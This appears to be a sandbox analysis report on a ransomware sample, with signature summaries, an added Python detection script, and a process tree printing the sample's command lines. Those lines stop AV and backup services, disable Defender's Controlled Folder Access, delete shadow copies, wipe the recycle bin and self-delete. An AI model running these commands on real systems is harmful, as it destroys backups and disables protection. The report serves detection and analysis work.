Analysis

  • max time kernel
    16s
  • max time network
    16s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
  • submitted
    14-12-2024 09:32

General

  • Target

    5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe

  • Size

    91KB

  • MD5

    be60e389a0108b2871dff12dfbb542ac

  • SHA1

    14b4e0bfac64ec0f837f84ab1780ca7ced8d670d

  • SHA256

    5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d

  • SHA512

    6051bec441434a80c34ee2752a3da9c3a0307cd1b551aa27a0f7f6f75b9bf64b172745d80f03eea054a03ebd2c493df21fd48d8fa3b706d46a6f7fee0e7c0641

  • SSDEEP

    1536:QguHLgeS6umiCp31W4qYXgsLlOqrgB9GpF7LXdarTkCAKL5dsluhtvM4CoLT6QPg:D6seqCp31Hgsp9a9GTrda8CAKLTsWkyI

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Renames multiple (64) files with added filename extension

    This suggests ransomware activity: files across the system are being encrypted and renamed.

  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Uses a powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Interacts with shadow copies 3 TTPs 14 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 3 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 2 IoCs
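The signatures above correspond to specific command lines in the process tree below: vssadmin Delete Shadows together with the 401MB/unbounded shadowstorage resize pair, a net stop chain against backup, AV and DLP services, sc config ... start= disabled, taskkill /F against office and desktop-sharing processes, and Set-MpPreference disabling Controlled Folder Access. The Python below is an added detection example written for this page, not code from the report or from the sandbox; it classifies process-creation command lines and flags a parent process that combines shadow-copy tampering with bulk stopping of backup/AV services. The (pid, ppid, command line) input shape, the Sysmon Event ID 1 / Security 4688 source, the control event under parent 1000 and the min_services threshold are assumptions; the service names and sample command lines are taken from the tree below.

```python
"""Added detection example, not part of the sandbox report.

Input shape is an assumption: (ProcessId, ParentProcessId, CommandLine) tuples
as pulled from Sysmon Event ID 1 or Security 4688. SAMPLE_EVENTS is constructed
from the report's process tree plus one constructed admin-action control.
"""
import re
from dataclasses import dataclass

# Lower-cased service names from the report's `net stop <svc> /y` chain
# (AV, DLP and backup agents). A production list would be much longer.
BACKUP_AV_SERVICES = {
    "avpsus", "mcafeedlpagentservice", "mfewc", "bmr boot service",
    "netbackup bmr mtftp service", "defwatch", "ccevtmgr", "ccsetmgr",
    "savroam", "rtvscan", "sophos", "zhudongfangyu", "veeam",
    "veeamtransportsvc", "veeamdeploymentservice", "veeamnfssvc", "vsnapvss",
    "acrsch2svc", "acronisagent", "backupexecvssprovider",
    "backupexecjobengine", "yoobackup", "casad2dwebsvc", "stc_raw_agent",
}

# (label, regex over the lower-cased command line). Shrinking shadow storage
# forces VSS to discard snapshots that no longer fit, so the 401MB/unbounded
# resize pair is a second deletion path and is tagged T1490 as well.
RULES = [
    ("T1490 shadow copy deletion",
     re.compile(r"\bvssadmin(\.exe)?\b.*\bdelete\s+shadows\b")),
    ("T1490 shadow storage resize",
     re.compile(r"\bvssadmin(\.exe)?\b.*\bresize\s+shadowstorage\b")),
    ("T1562.001 Controlled Folder Access disabled",
     re.compile(r"set-mppreference\b.*-enablecontrolledfolderaccess\s+disabled")),
    ("T1489 service start type set to disabled via sc",
     re.compile(r"\bsc(\.exe)?\b.*\bconfig\b.*\bstart=\s*disabled\b")),
    ("process killed via taskkill /F (unlocks files for encryption)",
     re.compile(r"\btaskkill(\.exe)?\b.*\s/im\s+\S+.*\s/f\b")),
    ("recycle bin wiped with rd /s /q",
     re.compile(r"\brd\b.*\s/s\s.*\$recycle\.bin")),
]
NET_STOP = re.compile(r'\bnet1?(\.exe)?"?\s+stop\s+(.+?)\s+/y\b')


@dataclass(frozen=True)
class Finding:
    pid: int
    technique: str
    command_line: str


def classify(command_line: str) -> list[str]:
    """Return the technique labels one command line triggers."""
    cl = command_line.lower()
    hits = [label for label, rx in RULES if rx.search(cl)]
    m = NET_STOP.search(cl)
    if m:
        svc = m.group(2).strip().strip('"')
        kind = "backup/AV service" if svc in BACKUP_AV_SERVICES else "service"
        hits.append(f"T1489 {kind} stopped: {svc}")
    return hits


def triage(events, min_services: int = 3) -> dict[int, str]:
    """Group findings by parent PID; flag a parent that touches shadow copies
    and stops at least `min_services` distinct backup/AV services."""
    by_parent: dict[int, list[Finding]] = {}
    for pid, ppid, cmd in events:
        for label in classify(cmd):
            by_parent.setdefault(ppid, []).append(Finding(pid, label, cmd))
    verdicts = {}
    for ppid, findings in by_parent.items():
        labels = [f.technique for f in findings]
        shadow = any(l.startswith("T1490") for l in labels)
        stopped = {l.split(": ", 1)[1] for l in labels
                   if l.startswith("T1489 backup/AV")}
        flagged = shadow and len(stopped) >= min_services
        verdicts[ppid] = "ransomware-precursor" if flagged else "review"
    return verdicts


# Constructed sample: parent 2508 and its children are taken from the report;
# PID 4242 under parent 1000 is a constructed admin action for contrast.
SAMPLE_EVENTS = [
    (2736, 2508, '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
                 'Set-MpPreference -EnableControlledFolderAccess Disabled'),
    (2836, 2508, '"net.exe" stop avpsus /y'),
    (2732, 2508, '"net.exe" stop BMR Boot Service /y'),
    (2108, 2508, '"net.exe" stop veeam /y'),
    (2484, 2508, '"sc.exe" config SQLTELEMETRY start= disabled'),
    (2388, 2508, '"taskkill.exe" /IM mspub.exe /F'),
    (1956, 2508, '"vssadmin.exe" Delete Shadows /all /quiet'),
    (1880, 2508, '"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB'),
    (2208, 2508, '"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded'),
    (1540, 2508, '"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin'),
    (4242, 1000, '"net.exe" stop Spooler /y'),
]

if __name__ == "__main__":
    for pid, ppid, cmd in SAMPLE_EVENTS:
        for label in classify(cmd):
            print(f"ppid={ppid} pid={pid} {label}")
    for ppid, verdict in triage(SAMPLE_EVENTS).items():
        print(f"parent {ppid}: {verdict}")
```

Run as a script it prints one label per matching event and a verdict per parent: 2508 is flagged because it both deletes shadow copies and stops three distinct backup/AV services, while the single net stop under parent 1000 only reaches "review". The threshold is the knob that keeps an administrator stopping one service out of the alert; note that net.exe and its net1.exe child both carry the service name, so on real telemetry one stopped service produces two findings and the set of service names, not the count of findings, is what should be thresholded.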

Processes

  • C:\Users\Admin\AppData\Local\Temp\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
    "C:\Users\Admin\AppData\Local\Temp\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe"
    1⤵
    • Drops startup file
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2508
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:2736
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop avpsus /y
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2836
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop avpsus /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3040
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop McAfeeDLPAgentService /y
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2868
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2940
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop mfewc /y
      2⤵
        PID:2760
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop mfewc /y
          3⤵
            PID:2152
        • C:\Windows\SysWOW64\net.exe
          "net.exe" stop BMR Boot Service /y
          2⤵
            PID:2732
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop BMR Boot Service /y
              3⤵
              • System Location Discovery: System Language Discovery
              PID:3132
          • C:\Windows\SysWOW64\net.exe
            "net.exe" stop NetBackup BMR MTFTP Service /y
            2⤵
            • System Location Discovery: System Language Discovery
            PID:2972
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
              3⤵
                PID:940
            • C:\Windows\SysWOW64\net.exe
              "net.exe" stop DefWatch /y
              2⤵
              • System Location Discovery: System Language Discovery
              PID:2740
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop DefWatch /y
                3⤵
                • System Location Discovery: System Language Discovery
                PID:1100
            • C:\Windows\SysWOW64\net.exe
              "net.exe" stop ccEvtMgr /y
              2⤵
              • System Location Discovery: System Language Discovery
              PID:2804
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop ccEvtMgr /y
                3⤵
                • System Location Discovery: System Language Discovery
                PID:1252
            • C:\Windows\SysWOW64\net.exe
              "net.exe" stop ccSetMgr /y
              2⤵
                PID:2968
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop ccSetMgr /y
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:2380
              • C:\Windows\SysWOW64\net.exe
                "net.exe" stop SavRoam /y
                2⤵
                • System Location Discovery: System Language Discovery
                PID:2808
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop SavRoam /y
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:1512
              • C:\Windows\SysWOW64\net.exe
                "net.exe" stop RTVscan /y
                2⤵
                • System Location Discovery: System Language Discovery
                PID:2768
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop RTVscan /y
                  3⤵
                    PID:2428
                • C:\Windows\SysWOW64\net.exe
                  "net.exe" stop QBFCService /y
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:1044
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop QBFCService /y
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:1092
                • C:\Windows\SysWOW64\net.exe
                  "net.exe" stop QBIDPService /y
                  2⤵
                    PID:2816
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop QBIDPService /y
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:1812
                  • C:\Windows\SysWOW64\net.exe
                    "net.exe" stop Intuit.QuickBooks.FCS /y
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:2744
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
                      3⤵
                        PID:2392
                    • C:\Windows\SysWOW64\net.exe
                      "net.exe" stop QBCFMonitorService /y
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:2776
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop QBCFMonitorService /y
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:1972
                    • C:\Windows\SysWOW64\net.exe
                      "net.exe" stop YooBackup /y
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:2660
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop YooBackup /y
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:1924
                    • C:\Windows\SysWOW64\net.exe
                      "net.exe" stop YooIT /y
                      2⤵
                        PID:2884
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop YooIT /y
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:1760
                      • C:\Windows\SysWOW64\net.exe
                        "net.exe" stop zhudongfangyu /y
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:2600
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop zhudongfangyu /y
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:2832
                      • C:\Windows\SysWOW64\net.exe
                        "net.exe" stop stc_raw_agent /y
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:2596
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop stc_raw_agent /y
                          3⤵
                            PID:2560
                        • C:\Windows\SysWOW64\net.exe
                          "net.exe" stop VSNAPVSS /y
                          2⤵
                            PID:2620
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop VSNAPVSS /y
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:2140
                          • C:\Windows\SysWOW64\net.exe
                            "net.exe" stop VeeamTransportSvc /y
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:2648
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop VeeamTransportSvc /y
                              3⤵
                                PID:1008
                            • C:\Windows\SysWOW64\net.exe
                              "net.exe" stop VeeamDeploymentService /y
                              2⤵
                              • System Location Discovery: System Language Discovery
                              PID:2652
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop VeeamDeploymentService /y
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:1692
                            • C:\Windows\SysWOW64\net.exe
                              "net.exe" stop VeeamNFSSvc /y
                              2⤵
                                PID:2676
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop VeeamNFSSvc /y
                                  3⤵
                                    PID:2396
                                • C:\Windows\SysWOW64\net.exe
                                  "net.exe" stop veeam /y
                                  2⤵
                                    PID:2108
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop veeam /y
                                      3⤵
                                        PID:2468
                                    • C:\Windows\SysWOW64\net.exe
                                      "net.exe" stop PDVFSService /y
                                      2⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3056
                                      • C:\Windows\SysWOW64\net1.exe
                                        C:\Windows\system32\net1 stop PDVFSService /y
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:3092
                                    • C:\Windows\SysWOW64\net.exe
                                      "net.exe" stop BackupExecVSSProvider /y
                                      2⤵
                                        PID:1764
                                        • C:\Windows\SysWOW64\net1.exe
                                          C:\Windows\system32\net1 stop BackupExecVSSProvider /y
                                          3⤵
                                            PID:1080
                                        • C:\Windows\SysWOW64\net.exe
                                          "net.exe" stop BackupExecAgentAccelerator /y
                                          2⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:2944
                                          • C:\Windows\SysWOW64\net1.exe
                                            C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
                                            3⤵
                                              PID:1756
                                          • C:\Windows\SysWOW64\net.exe
                                            "net.exe" stop BackupExecAgentBrowser /y
                                            2⤵
                                              PID:1680
                                              • C:\Windows\SysWOW64\net1.exe
                                                C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
                                                3⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:2964
                                            • C:\Windows\SysWOW64\net.exe
                                              "net.exe" stop BackupExecDiveciMediaService /y
                                              2⤵
                                                PID:2700
                                                • C:\Windows\SysWOW64\net1.exe
                                                  C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
                                                  3⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1744
                                              • C:\Windows\SysWOW64\net.exe
                                                "net.exe" stop BackupExecJobEngine /y
                                                2⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:1816
                                                • C:\Windows\SysWOW64\net1.exe
                                                  C:\Windows\system32\net1 stop BackupExecJobEngine /y
                                                  3⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2800
                                              • C:\Windows\SysWOW64\net.exe
                                                "net.exe" stop BackupExecManagementService /y
                                                2⤵
                                                  PID:1688
                                                  • C:\Windows\SysWOW64\net1.exe
                                                    C:\Windows\system32\net1 stop BackupExecManagementService /y
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2536
                                                • C:\Windows\SysWOW64\net.exe
                                                  "net.exe" stop BackupExecRPCService /y
                                                  2⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1996
                                                  • C:\Windows\SysWOW64\net1.exe
                                                    C:\Windows\system32\net1 stop BackupExecRPCService /y
                                                    3⤵
                                                      PID:1808
                                                  • C:\Windows\SysWOW64\net.exe
                                                    "net.exe" stop AcrSch2Svc /y
                                                    2⤵
                                                      PID:2848
                                                      • C:\Windows\SysWOW64\net1.exe
                                                        C:\Windows\system32\net1 stop AcrSch2Svc /y
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:2012
                                                    • C:\Windows\SysWOW64\net.exe
                                                      "net.exe" stop AcronisAgent /y
                                                      2⤵
                                                        PID:936
                                                        • C:\Windows\SysWOW64\net1.exe
                                                          C:\Windows\system32\net1 stop AcronisAgent /y
                                                          3⤵
                                                            PID:748
                                                        • C:\Windows\SysWOW64\net.exe
                                                          "net.exe" stop CASAD2DWebSvc /y
                                                          2⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:820
                                                          • C:\Windows\SysWOW64\net1.exe
                                                            C:\Windows\system32\net1 stop CASAD2DWebSvc /y
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:1604
                                                        • C:\Windows\SysWOW64\net.exe
                                                          "net.exe" stop CAARCUpdateSvc /y
                                                          2⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:2796
                                                          • C:\Windows\SysWOW64\net1.exe
                                                            C:\Windows\system32\net1 stop CAARCUpdateSvc /y
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:3156
                                                        • C:\Windows\SysWOW64\net.exe
                                                          "net.exe" stop sophos /y
                                                          2⤵
                                                            PID:592
                                                            • C:\Windows\SysWOW64\net1.exe
                                                              C:\Windows\system32\net1 stop sophos /y
                                                              3⤵
                                                                PID:3148
                                                            • C:\Windows\SysWOW64\sc.exe
                                                              "sc.exe" config SQLTELEMETRY start= disabled
                                                              2⤵
                                                              • Launches sc.exe
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2484
                                                            • C:\Windows\SysWOW64\sc.exe
                                                              "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
                                                              2⤵
                                                              • Launches sc.exe
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2072
                                                            • C:\Windows\SysWOW64\sc.exe
                                                              "sc.exe" config SQLWriter start= disabled
                                                              2⤵
                                                              • Launches sc.exe
                                                              PID:2296
                                                            • C:\Windows\SysWOW64\sc.exe
                                                              "sc.exe" config SstpSvc start= disabled
                                                              2⤵
                                                              • Launches sc.exe
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2144
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              "taskkill.exe" /IM mspub.exe /F
                                                              2⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Kills process with taskkill
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2388
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              "taskkill.exe" /IM mydesktopqos.exe /F
                                                              2⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Kills process with taskkill
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2076
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              "taskkill.exe" /IM mydesktopservice.exe /F
                                                              2⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Kills process with taskkill
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2212
                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                              "vssadmin.exe" Delete Shadows /all /quiet
                                                              2⤵
                                                              • Interacts with shadow copies
                                                              PID:1956
                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                              "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
                                                              2⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Interacts with shadow copies
                                                              PID:1880
                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                              "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
                                                              2⤵
                                                              • Interacts with shadow copies
                                                              PID:2208
                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                              "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
                                                              2⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Interacts with shadow copies
                                                              PID:2256
                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                              "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
                                                              2⤵
                                                              • Interacts with shadow copies
                                                              PID:2272
                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                              "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
                                                              2⤵
                                                              • Interacts with shadow copies
                                                              PID:2192
                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                              "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
                                                              2⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Interacts with shadow copies
                                                              PID:1628
                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                              "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
                                                              2⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Interacts with shadow copies
                                                              PID:3008
                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                              "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
                                                              2⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Interacts with shadow copies
                                                              PID:628
                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                              "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
                                                              2⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Interacts with shadow copies
                                                              PID:324
                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                              "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
                                                              2⤵
                                                              • Interacts with shadow copies
                                                              PID:1800
                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                              "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
                                                              2⤵
                                                              • Interacts with shadow copies
                                                              PID:2492
                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                              "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
                                                              2⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Interacts with shadow copies
                                                              PID:884
                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                              "vssadmin.exe" Delete Shadows /all /quiet
                                                              2⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Interacts with shadow copies
                                                              PID:1088
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
                                                              2⤵
                                                              PID:1540
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpB8D4.bat
                                                              2⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:3384
                                                            • C:\Windows\SysWOW64\notepad.exe
                                                              "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
                                                              2⤵
                                                              • Opens file in notepad (likely ransom note)
                                                              PID:1920
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
                                                              2⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                              PID:3120
                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                ping 127.0.0.7 -n 3
                                                                3⤵
                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                • Runs ping.exe
                                                                PID:3296
                                                              • C:\Windows\SysWOW64\fsutil.exe
                                                                fsutil file setZeroData offset=0 length=524288 “%s”
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2472
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                              2⤵
                                                              • Deletes itself
                                                              PID:3260
                                                              • C:\Windows\SysWOW64\choice.exe
                                                                choice /C Y /N /D Y /T 3
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2152

                                                            Network

                                                            • DNS
                                                              www.google.com
                                                              5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                              Remote address:
                                                              8.8.8.8:53
                                                              Request
                                                              www.google.com
                                                              IN A
                                                              Response
                                                              www.google.com
                                                              IN A
                                                              172.217.20.164
                                                            • DNS
                                                              raw.githubusercontent.com
                                                              5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                              Remote address:
                                                              8.8.8.8:53
                                                              Request
                                                              raw.githubusercontent.com
                                                              IN A
                                                              Response
                                                              raw.githubusercontent.com
                                                              IN A
                                                              185.199.109.133
                                                              raw.githubusercontent.com
                                                              IN A
                                                              185.199.110.133
                                                              raw.githubusercontent.com
                                                              IN A
                                                              185.199.108.133
                                                              raw.githubusercontent.com
                                                              IN A
                                                              185.199.111.133
                                                            • GET
                                                              https://www.google.com/
                                                              5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                              Remote address:
                                                              172.217.20.164:443
                                                              Request
                                                              GET / HTTP/1.1
                                                              Host: www.google.com
                                                              Connection: Keep-Alive
                                                              Response
                                                              HTTP/1.1 302 Found
                                                              Location: https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS117BTGL6h9boGIjBhD4AsU-MkuqdAtpjmCOPi31BrDIIx92c8fgH1mho6lQBmTBbgzYaHOoDBWdxkHioyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                              x-hallmonitor-challenge: CgsIv6H1ugYQgoLOcRIEtdewUw
                                                              Content-Type: text/html; charset=UTF-8
                                                              Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-MPPMBAoElj2LhQtJaQKyZg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                              Date: Sat, 14 Dec 2024 09:32:47 GMT
                                                              Server: gws
                                                              Content-Length: 398
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              Set-Cookie: AEC=AZ6Zc-VOgrBE0GEgvwR4QImIH-kA1PGUkkFMs5IqdLRz3BXg47BCOyR1Pg; expires=Thu, 12-Jun-2025 09:32:47 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                              Set-Cookie: __Secure-ENID=24.SE=BKNlNZ7vs4uiP5AOxulecExQJvZtaT7oWAFNKnM8XIWC8i7DDMypEdJGol3DySVfCJ9lIISYnR6iy9aaVOVKPrSNIgB_A4BH3EvJgKN12EhLirq0kCBMA5AcrdWEij6QxI9c1td2y2lylhOQfDP9ILv-mNBDpvAwbJumUJC2XMjxjMWykEgsvJoMTtzsBSPUQE3b3y8c; expires=Wed, 14-Jan-2026 01:51:04 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            • GET
                                                              https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS117BTGL6h9boGIjBhD4AsU-MkuqdAtpjmCOPi31BrDIIx92c8fgH1mho6lQBmTBbgzYaHOoDBWdxkHioyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                              5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                              Remote address:
                                                              172.217.20.164:443
                                                              Request
                                                              GET /sorry/index?continue=https://www.google.com/&q=EgS117BTGL6h9boGIjBhD4AsU-MkuqdAtpjmCOPi31BrDIIx92c8fgH1mho6lQBmTBbgzYaHOoDBWdxkHioyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                              Host: www.google.com
                                                              Response
